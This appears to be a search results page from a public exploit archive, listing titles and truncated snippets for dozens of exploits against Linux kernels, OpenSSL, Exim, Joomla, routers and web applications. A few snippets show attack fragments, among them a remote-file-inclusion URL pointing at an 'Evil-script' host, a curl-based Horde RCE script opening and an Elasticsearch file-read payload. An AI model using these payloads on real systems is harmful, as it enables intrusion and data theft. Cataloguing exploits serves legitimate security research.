41207 matches found
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - AF_PACKET Race Condition Privilege Escalation
Linux Kernel 4.4.0-21 < 4.4.0-51 Ubuntu 14.04/16.04 x86-64 - AF_PACKET Race Condition Privilege Escalation / chocobo_root.c linux AF_PACKET race condition exploit for CVE-2016-8655. Includes KASLR and SMEP/SMAP bypasses. For Ubuntu 14.04 / 16.04 x86_64 kernels 4.4.0 before 4.4.0-53.74. All kernel offset...
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service Exploit Title: Exim ESMTP GHOST DoS PoC Exploit Date: 1/29/2015 Exploit Author: 1N3 Vendor Homepage: www.exim.org Version: 4.80 or less Tested on: debian-7-7-64b CVE : 2015-0235 #!/usr/bin/python Exim ESMTP DoS Exploit by 1N3 v20150128...
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak 2 DTLS Support / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leake...
Link ADS 1 - linkid SQL Injection
Link ADS 1 - linkid SQL Injection Link ADS 1 SQL Injection Vulnerability ======================================================== Author: Hussin X Home : www.tryag.cc/cc email: darkangelg85atYahooDoTcom hussin.xathotmailDoTcom ======================================================== HomE script :...
YABB SE 0.81.41.5 - Packages.php Remote File Inclusion
YABB SE 0.81.41.5 - Packages.php Remote File Inclusion source: https://www.securityfocus.com/bid/6663/info YaBB SE allows remote users to influence the location of included files. A remote attacker may exploit this condition to cause an external, attacker-supplied file to be included and executed...
Sysaid 20.1.11 b26 - Remote Command Execution
Sysaid 20.1.11 b26 - Remote Command Execution Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution Google Dork: intext:"Help Desk Software by SysAid " Date: 2020-03-09 Exploit Author: Ahmed Sherif Vendor Homepage: https://www.sysaid.com/free-help-desk-software Software Link:...
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
Linux Kernel 4.8.0-41-generic Ubuntu - Packet Socket Local Privilege Escalation // A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // //...
RomPager 4.34 (Multiple Router Vendors) - Misfortune Cookie Authentication Bypass
RomPager 4.34 Multiple Router Vendors - Misfortune Cookie Authentication Bypass Title: Misfortune Cookie Exploit RomPager <= 4.34 router authentication remover Date: 17/4/2016 CVE: CVE-2015-9222 http://mis.fortunecook.ie Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... Vulnerable models...
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak 1 / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information...
PHPhotoalbum - Arbitrary File Upload
PHPhotoalbum - Arbitrary File Upload [ASCII-art banner: team wlhaan hacker] ...
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1 Exploit Title: HttpFileServer 2.3.x Remote Command Execution Google Dork: intext:"httpfileserver 2.3" Date: 11-09-2014 Remote: Yes Exploit Author: Daniele Linguaglossa Vendor Homepage: http://rejetto.com/ Software Link:...
ElasticSearch - Remote Code Execution
ElasticSearch - Remote Code Execution body padding-top: 50px; .starter-template padding: 40px 15px; text-align: center; function esinject var readfile; var writefile; readfile = functionfilename return "import java.util.;\nimport java.io.;\nnew Scannernew File"" + filename +...
Open Realty 2.x3.x - Persistent Cross-Site Scripting
Open Realty 2.x/3.x - Persistent Cross-Site Scripting Title: persistence XSS flaw in Open Realty 2.x and 3.x Author: K053 Date: 2010-7-24 Homepage: http://open-realty.org Download Link: http://www.open-realty.org/download.html Version: 3.x & 2.x...
Pasworld - detail.php Blind SQL Injection
Pasworld - detail.php Blind SQL Injection ========================================================= + Title :- Pasworld detail.php Blind Sql Injection Vulnerability + Date :- 5 - June - 2015 + Vendor Homepage: :- http://main.pasworld.co.th/ + Version :- All Versions + Tested on :- Nginx/1.4.5,...
Nginx 0.6.36 - Directory Traversal
Nginx 0.6.36 - Directory Traversal Exploit Title: nginx engine x http server <= 0.6.36 Path Traversal Date: 20/05/10 Author: cp77fk4r | empty0pageSHIFT+2gmail.com | www.DigitalWhisper.co.il Software Link: http://nginx.org/ Version: <= 0.6.36 Tested on: Win32 Path Traversal: A Path Traversal attack...
DUware DUpaypal 3.03.1 - detail.asp?iPro SQL Injection
DUware DUpaypal 3.03.1 - detail.asp?iPro SQL Injection source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
SpyHunter 4 - SpyHunter 4 Service Unquoted Service Path
SpyHunter 4 - SpyHunter 4 Service Unquoted Service Path Exploit Title: SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path Discovery by: Alejandro Reyes Discovery Date: 2020-03-05 Vendor Homepage: https://www.enigmasoftware.com Software Link :...
OpenSMTPD 6.6.3p1 - Local Privilege Escalation + Remote Code Execution
OpenSMTPD 6.6.3p1 - Local Privilege Escalation + Remote Code Execution / LPE and RCE in OpenSMTPD's default install CVE-2020-8794 Copyright (C) 2020 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by...
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 2040.5034: Access violation - code c0000005 first...
Lua 5.3.5 - debug.upvaluejoin Use After Free
Lua 5.3.5 - debug.upvaluejoin Use After Free Exploit Title: Lua 5.3.5 Exploit Author: Fady Mohamed Osman https://twitter.com/fadyothman Exploit-db : http://www.exploit-db.com/author/?a=2986 Blog : https://blog.fadyothman.com/ Date: Jan. 10th 2019 Vendor Homepage: https://www.lua.org/ Software Lin...
Advanced Comment System 1.0 - SQL Injection
Advanced Comment System 1.0 - SQL Injection Exploit Title: SQL injection in Advanced comment system v1.0 Date: 29-10-2018 Exploit Author: Rafael Pedrero Vendor Homepage: http://www.plohni.com Software Link: http://www.plohni.com/wb/content/php/download/Advancedcommentsystem1-0.zip,...
Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant. Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp...
Microsoft Windows - .LNK Shortcut File Code Execution (Metasploit)
Microsoft Windows - .LNK Shortcut File Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LNK Remote Code Execution Vulnerability', 'Description' = %q This module exploits...
WebDM CMS - SQL Injection
WebDM CMS - SQL Injection WebDM CMS SQL Injection Vulnerability EDB-ID: CVE: OSVDB-ID: Author: Dr.0rYX and Cr3w-DZ Published: Verified: Exploit Code: Vulnerable App: [ASCII-art banner] ...
AtomixMP3 2.3 - .m3u Local Buffer Overflow
AtomixMP3 2.3 - .m3u Local Buffer Overflow / ======================================================================== 0-day AtomixMP3 November 2006 - Month Of Greg's Media Player Exploits : i'll probably continue it into December Discovered and Reported By: Greg Linares [email protected]...
snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (2)
snapd 2.37 Ubuntu - dirty_sock Local Privilege Escalation 2 #!/usr/bin/env python3 """ dirty_sock: Privilege Escalation in Ubuntu via snapd In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository...
Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution
Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution #!/usr/bin/env python Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header Date: 12/17/2015 Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs @0xcclabs...
Simple-HTTPD
Remote root on sfr/ubiquisys femtocell webserver wsal/shttpd/mongoose ToDo: Add execute shell ToDo: Test vulnerable targets Modified by JSacco - [email protected] part of femtocell research by TU-Berlin only for educational purposes Exploit Title: remote root on sfr/ubiquisys femtocell...
PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload
PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload date"U"-300 43. 44. fnc"laneMakeToken", "file", $GET"id", array 45. "user.username" = me"username", 46. "file" = "system/cache/temp/".$filename, 47. ; 48. PHPizabi is prone to a vulnerability that lets remote attackers to upload and execute...
Pivot 1.0 - module_db.php Remote File Inclusion
Pivot 1.0 - module_db.php Remote File Inclusion source: https://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the module_db.php script. This issue is due to a failure of the application to properly sanitize...
Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.exagate.com/ Software Link: https://www.exagate.com/sysguard-6001 Version: SYSGuard 6001 HTML...
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Date: 2020-03-11 Vendor: https://www.watchguard.com Software link:...
ASUS GiftBox Desktop 1.1.1.127 - ASUSGiftBoxDesktop Unquoted Service Path
ASUS GiftBox Desktop 1.1.1.127 - ASUSGiftBoxDesktop Unquoted Service Path Exploit Title: ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path Discovery by: Oscar Flores Discovery Date: 2020-03-05 Vendor Homepage: https://www.asus.com/ Software Link :...
Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure
Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure CVE-2010-1157: Apache Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 6.0.0 to 6.0.26 - - Tomcat 5.5.0 to 5.5.29 Note: The unsupported Tomcat 3.x, 4.x an...
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
Cisco Adaptive Security Appliance - Path Traversal Metasploit require 'msf/core' class MetasploitModule "Cisco Adaptive Security Appliance - Path Traversal", 'Description' = %q Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow ...
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - CONFIG_X86_X32=y Local Privilege Escalation (3)
Linux Kernel 3.4 < 3.13.2 Ubuntu 13.04/13.10 x64 - CONFIG_X86_X32=y Local Privilege Escalation 3 / ============================== recvmmsg.c - linux 3.4+ local root CONFIG_X86_X32=y CVE-2014-0038 / x32 ABI with recvmmsg by rebel @ irc.smashthestack.org ----------------------------------- takes about 13...
Dolphin 7.0.3 - Multiple Vulnerabilities
Dolphin 7.0.3 - Multiple Vulnerabilities Exploit Title: Dolphin Multi Vulnerability Date : 29-10-2010 Author : anT!-Tr0J4n Version : 7.0.3 DorK : Powered by Dolphin Greetz : Dev-PoinT.com inj3ct0r.com All Dev-poinT members and my friends Home : www.Dev-PoinT.com : http://inj3ct0r.com Email :...
Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections
Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections -+================================================================================+- -+ AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilities +- -+================================================================================+- Discovered By:...
VP-ASP 6.00 - shopcurrency.asp SQL Injection
VP-ASP 6.00 - shopcurrency.asp SQL Injection VP-ASP 6.00 SQL Injection / Exploit by [email protected] people claimed there is some underground sploit for vp-asp 6.00 and I was sure that if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ well it didn't...
RICOH Aficio SP 5200S Printer - entryNameIn HTML Injection
RICOH Aficio SP 5200S Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Discovery by: Paulina Girón Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML...
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Local Privilege Escalation
Linux Kernel 4.6.2 Ubuntu 16.04.1 - IP6T_SO_SET_REPLACE Local Privilege Escalation Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call Date: 2016.10.8 Exploit Author: Qian Zhang@MarvelTeam Qihoo 360 Version: Linux kernel <= 4.6.2 Tested on:...
PHP 5.2.6 - create_function() Code Injection (1)
PHP 5.2.6 - create_function() Code Injection 1 source: https://www.securityfocus.com/bid/31398/info PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be...
PHPRaid 3.0.7 - rss.php?PHPraid_dir Remote File Inclusion
PHPRaid 3.0.7 - rss.php?PHPraid_dir Remote File Inclusion #!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraid_dir=Evil-script? use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path !~ /http:\/\// || $Pathtocmd !~ /http:\/\// ||...
MetaCart E-Shop V-8 - IntProdID SQL Injection
MetaCart E-Shop V-8 - IntProdID SQL Injection source: https://www.securityfocus.com/bid/13376/info An SQL injection vulnerability affects MetaCart e-Shop V-8. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. An attack...
NetBackup 7.0 - NetBackup INET Daemon Unquoted Service Path
NetBackup 7.0 - NetBackup INET Daemon Unquoted Service Path Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Discovery by: Alan Mondragon "El Masas" Discovery Date: 2020-03-17 Vendor Homepage: https://www.veritas.com/ Software Link : https://www.veritas.com/ Veritas...
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution #!/bin/sh if [ "$#" -ne 4 ]; then echo '! Usage: ' 1>&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$(mktemp)" trap 'rm -f "$JAR"' EXIT echo "+ Logging in as $USERNAME:$PASSWORD" 1>&2 curl -si -c "$JAR" "$BASE/login.php" ...
Cisco Data Center Network Manager 11.2.1 - LanFabricImpl Command Injection
Cisco Data Center Network Manager 11.2.1 - LanFabricImpl Command Injection #!/usr/bin/python """ Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal...
Liferay Portal 7.1 CE GA3 SimpleCaptcha API - Cross-Site Scripting
Liferay Portal 7.1 CE GA3 SimpleCaptcha API - Cross-Site Scripting Exploit Title: Liferay Portal ” / or ” /. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code...
Microsoft Windows - Win32k Local Privilege Escalation
Microsoft Windows - Win32k Local Privilege Escalation CVE-2019-0803 Win32k Elevation of Privilege Poc Reference ----------------------------- steal Security token https://github.com/mwrlabs/CVE-2016-7255 EDB Note: Download...